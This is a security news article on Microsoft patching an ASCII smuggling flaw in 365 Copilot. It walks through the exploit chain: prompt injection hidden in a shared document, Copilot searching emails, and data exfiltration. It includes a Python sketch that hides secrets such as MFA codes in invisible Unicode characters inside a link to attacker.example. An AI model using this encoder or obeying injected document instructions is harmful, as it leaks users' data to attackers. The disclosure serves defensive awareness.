
Microsoft Patches ASCII Smuggling Vulnerability in Recent Security Update

Vlad CONSTANTINESCU

August 27, 2024

Microsoft has patched a critical vulnerability in its 365 Copilot service that exposed user data to severe risks through an advanced exploitation technique known as ASCII smuggling, the company announced.

Under the right conditions, perpetrators could exploit this vulnerability to steal multi-factor authentication (MFA) codes and other sensitive information from users.

ASCII Smuggling Puts Sensitive Data at Risk

Security researcher Johann Rehberger explained the mechanics behind ASCII smuggling: “ASCII Smuggling is a novel technique that uses special Unicode characters that mirror ASCII but are actually not visible in the user interface. This means that an attacker can have the LLM render, to the user, invisible data, and embed them within clickable hyperlinks. This technique basically stages the data for exfiltration!”

The flaw hinged on several interlinked attack methods that form a potential exploit chain:

  • Prompt Injection: Initiated through malicious content hidden within a document shared via chat
  • Payload Execution: Using the injected prompt to compel Copilot to search through additional emails and documents
  • Data Exfiltration: Using ASCII smuggling to lure the user into clicking a hyperlink that exfiltrates sensitive data to an attacker-controlled server
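The invisible-character trick at the heart of the exfiltration step relies on the Unicode Tags block (U+E0000–U+E007F), whose code points mirror printable ASCII but render as nothing in most user interfaces. A minimal Python sketch of that encoding, with an illustrative, hypothetical attacker URL, might look like this:

```python
# Sketch of the ASCII-smuggling encoding Rehberger describes: each printable
# ASCII character is shifted into the invisible Unicode "Tags" block
# (U+E0000 offset), so the text survives copy/paste but is not displayed.

def smuggle(text: str) -> str:
    """Encode printable ASCII as invisible Unicode Tag characters."""
    return "".join(chr(0xE0000 + ord(c)) for c in text if 0x20 <= ord(c) <= 0x7E)

def unsmuggle(mixed: str) -> str:
    """Recover hidden ASCII by picking out Tag characters and shifting back."""
    return "".join(chr(ord(c) - 0xE0000) for c in mixed
                   if 0xE0020 <= ord(c) <= 0xE007E)

secret = "MFA code: 123456"
# The hyperlink below looks like an ordinary URL to the user; the query
# string carries the invisible payload to a hypothetical attacker server.
link = "https://attacker.example/?q=" + smuggle(secret)
assert unsmuggle(link) == secret  # the hidden data round-trips intact
```

Because the Tag characters are zero-width in most renderers, a user inspecting the hyperlink sees only the visible URL while the smuggled data rides along in the link that Copilot renders.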

Patched Before It Could Be Exploited

Following the vulnerability’s disclosure in January, Microsoft released a patch that fixed the flaw before it could be exploited in the wild.

Security researchers demonstrated proof-of-concept attacks that could manipulate Copilot responses, extract private data, and bypass security measures.

‘LOLCopilot’ Could Turn AI Systems into Spear-Phishing Tools

One particularly alarming exploit, referred to as “LOLCopilot,” could let threat actors weaponize an AI system, turning it into a spear-phishing tool that could send phishing messages that mimic the communication style of the compromised account.

Additionally, Microsoft acknowledged the risks posed by publicly accessible Copilot bots created with Microsoft Copilot Studio, especially those without proper authentication measures.

Threat actors with prior knowledge of a bot’s name or URL could exploit these bots to siphon off sensitive information.
